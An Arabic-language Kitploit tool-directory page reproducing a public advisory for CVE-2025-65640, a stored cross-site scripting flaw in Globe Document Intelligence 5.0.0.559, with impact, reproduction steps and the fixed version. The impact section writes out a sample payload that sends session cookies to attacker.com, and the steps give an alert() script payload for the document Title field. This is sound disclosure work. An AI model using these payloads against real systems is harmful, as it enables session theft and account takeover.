Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65640 — إعلان عام لـ CVE-2025-65640: ثغرة XSS مخزّنة في Globe Document Intelligence. | Kitploit
أدوات/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

إعلان عام لـ CVE-2025-65640: ثغرة XSS مخزّنة في Globe Document Intelligence.

عرض المستودع
10منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-65640

1. معلومات الثغرة

  • معرّف CVE: CVE-2025-65640 (محجوز حاليًا)
  • نوع الثغرة: برمجة نصية عبر المواقع مخزنة (Stored XSS)
  • درجة CVSSv3: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • البائع: Arket/Bluenext S.r.l.
  • المنتج: Globe Document Intelligence
  • الإصدار المتأثر: 5.0.0.559
  • المكتشف: Vincenzo Emanuele Martone

2. الوصف

تم تحديد ثغرة برمجة نصية عبر المواقع مخزنة (Stored XSS) في منصة Globe Document Intelligence (الإصدار 5.0.0.559). يفشل التطبيق في تنظيف أو ترميز المدخلات التي يقدمها المستخدم بشكل صحيح داخل خاصية "Title" لمستند تم إنشاؤه حديثًا. عندما ينتقل مستخدم مصادق إلى صفحات الملخص (مثل "Task in progress / Recent")، يتم انعكاس الحمولة الضارة وتنفيذها في سياق متصفح الضحية.

3. الأثر

تسمح هذه الثغرة لمهاجم مصادق بتخزين كود JavaScript ضار على الخادم. عندما يشاهد مستخدمون مصادقون آخرون (بما في ذلك الحسابات الإدارية) الصفحات المتأثرة، يتم تنفيذ البرنامج النصي تلقائيًا. بينما يوضح إثبات المفهوم أدناه الثغرة باستخدام alert() غير ضار، يمكن للمهاجم استغلال هذا الخلل لتحقيق اختطاف الجلسة والاستيلاء على الحساب. على سبيل المثال، حقن حمولة مثل <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> من شأنه أن يسرق ملفات تعريف ارتباط الجلسة الخاصة بالضحية بصمت إلى خادم خارجي يسيطر عليه المهاجم.

4. خطوات إعادة الإنتاج (إثبات المفهوم)

لإعادة إنتاج الثغرة، يمكن لمهاجم مصادق اتباع الخطوات التالية:

  1. انتقل إلى قسم إنشاء المستندات ("Nuovo documento") واملأ الحقول المطلوبة ببيانات عشوائية لإنشاء مستند جديد بنجاح.
  2. قدّم النموذج وأنشئ المستند.
  3. حدد المستند الذي تم إنشاؤه حديثًا، وافتح قائمة السياق (النقر بزر الماوس الأيمن -> خصائص المستند)، وحدد حقل "Title".
  4. احقن الحمولة الأساسية التالية لحقن XSS في حقل "Title": <script>alert("XSS")</script>
  5. احفظ التغييرات. يتم الآن تخزين الحمولة الضارة بشكل دائم في قاعدة البيانات.
  6. انتقل إلى صفحة "Task in progress / Recent" (Task in attesa/Recenti).
  7. نظرًا لأن الصفحة تعرض عنوان المستند دون ترميز مخرجات مناسب، يتم تنفيذ حمولة JavaScript، مما يؤدي إلى تشغيل التنبيه.

5. التخفيف الموصى به

وفقًا للبائع، تمت معالجة هذه الثغرة في الإصدار 5.1.0.575. لعلاج هذه المشكلة، يُوصى بتحديث منصة Globe Document Intelligence إلى الإصدار 5.1.0.575.


إخلاء المسؤولية

إثبات المفهوم هذا (PoC) مُقدَّم حصريًا للأغراض التعليمية والبحثية. يجب عدم استخدام المعلومات والكود الموضح في هذا المستند في أنشطة ضارة أو ضد أي أنظمة دون إذن صريح ومسبق من مالكي الأنظمة. لا يتحمل المؤلف أي مسؤولية ولا يتحمل مسؤولية أي إساءة استخدام أو ضرر ناتج عن تطبيق المواد المقدمة.

تنزيل الأداة